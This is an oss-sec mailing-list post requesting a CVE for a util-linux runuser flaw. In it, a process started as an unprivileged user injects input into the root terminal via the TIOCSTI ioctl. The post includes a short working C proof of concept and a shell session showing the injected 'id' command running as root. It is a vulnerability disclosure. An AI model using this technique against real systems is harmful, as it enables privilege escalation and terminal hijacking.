oss-sec mailing list archives
CVE Request: util-linux runuser tty hijacking via TIOCSTI ioctl
From: up201407890 () alunos dcc fc up pt
Date: Fri, 26 Feb 2016 15:54:16 +0100
This is a similar issue to the one I posted yesterday on oss-sec, but to runuser(1) from util-linux, which can only be run as root for the purpose of executing programs as another user.
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=815922 When executing a program via "runuser -u nonpriv program" the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing privilege escalation. This issue has been fixed in "su" by calling setsid() and in "sudo" by using the "use_pty" flag # cat test.c #include <sys/ioctl.h> int main() { char *cmd = "id\n"; while(*cmd) ioctl(0, TIOCSTI, cmd++); } # gcc test.c -o test # id saken uid=1000(saken) gid=1000(saken) groups=1000(saken) # runuser -u saken ./test ---> last command i type in id # id ---> did not type this uid=0(root) gid=0(root) groups=0(root) I'd like to request a CVE for this issue. Thanks, Federico Bento ---------------------------------------------------------------- This message was sent using IMP, the Internet Messaging Program.
Current thread:
- CVE Request: util-linux runuser tty hijacking via TIOCSTI ioctl up201407890 (Feb 26)
- Re: CVE Request: util-linux runuser tty hijacking via TIOCSTI ioctl cve-assign (Feb 27)
- Re: Re: CVE Request: util-linux runuser tty hijacking via TIOCSTI ioctl Alexander E. Patrakov (Feb 28)
- Re: CVE Request: util-linux runuser tty hijacking via TIOCSTI ioctl -- chroot cve-assign (Feb 28)
- Re: Re: CVE Request: util-linux runuser tty hijacking via TIOCSTI ioctl Alexander E. Patrakov (Feb 28)
- Re: CVE Request: util-linux runuser tty hijacking via TIOCSTI ioctl cve-assign (Feb 27)